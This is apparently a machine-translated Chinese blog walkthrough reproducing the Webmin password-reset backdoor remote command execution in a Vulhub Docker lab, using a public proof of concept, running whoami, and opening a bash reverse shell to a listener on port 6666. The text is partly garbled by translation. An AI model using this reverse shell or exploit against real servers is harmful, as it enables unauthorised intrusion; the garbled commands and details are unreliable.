如何入侵服务器,黑客入侵服务器的方法与教程

漏洞描述最近,webmin被发现存在远程命令执行漏洞。经过分析,初步猜测是后门植入事件。webmin是目前最强大的基于web的unix系统管理工具。管理员可以通过浏览器访问webmin的各

本文最后更新时间:  2023-04-21 06:45:42

漏洞描述

最近,webmin被发现存在远程命令执行漏洞。经过分析,初步猜测是后门植入事件。webmin是目前最强大的基于web的unix系统管理工具。管理员可以通过浏览器访问webmin的各种管理功能,完成相应的管理动作。当用户打开webmin的密码重置功能时,攻击者可以通过发送post请求在目标系统中执行任意命令,而无需进行身份验证。

影响范围:webmin<>漏洞重现

进入vuhub后,直接执行docker-compose up -d拉镜构造。

建好之后直接访问192.168.1.1:10000。但是vuhub建的网站有问题,根据它报错的提示修改一下还是挺有必要的。所以在这里,你需要使用https来访问它,否则你不会被授予访问权限:https://192.168.1.1:10000/

那就是我们的利用了。访问https://192 . 168 . 67 . 135:10000/password _ change . CGI,这种情况下访问会出错,所以这里需要修改配置文件。

然后进入后台修改配置文件。这种情况下直接用docker exec it id号/bin/bash就可以了。

转到/etc/webmin目录并检查配置文件。我们要修改的是config中references _ one = 1的配置。

但是在docker容器中,它没有编辑器,所以在这里,我们需要安装一个vim编辑器。

Cat /etc/os-release首先进入容器检查发行版,确定是使用yum还是apt安装工具。

可以看到用的debian8的操作系统,然后apt安装,apt安装vim。

然后编辑配置文件,将references _ one = 1更改为references _ one = 0。

然后访问那个路径,可以看到我们这边的页面也相应的发生了变化,已经停止报错了。

然后,接下来的事情就是使用poc来重现漏洞。这种情况下,访问https://192 . 168 . 1 . 1:10000/password _ change . CGI,用打嗝抓取包。

使用在线poc,您可以看到该命令已成功执行

看到效果后,很明显命令执行成功了。

执行一个whoami,它也成功地在这里输出相应的权限。

然后我们要弹回shell,因为它可以在这里执行execute命令,然后我们可以直接执行bash-c “bash-I >& amp/dev/TCP/192 . 168 . 1 . 1/6666 0 >& amp1”接收外壳服务器的端口6666)

然后,执行这个命令,然后我们的服务器会监听6666,收到弹回的shell。这里,一方面需要将有效载荷编码到url中,然后执行它。

那边的服务器监听从端口6666返回的shell,我们可以看到我们执行的有效负载。右边的页面是白色空,表示成功了。

然后就可以看到成功的反弹了。一颗炮弹来了。

温馨提示:内容均由网友自行发布提供,仅用于学习交流,如有版权问题,请联系我们。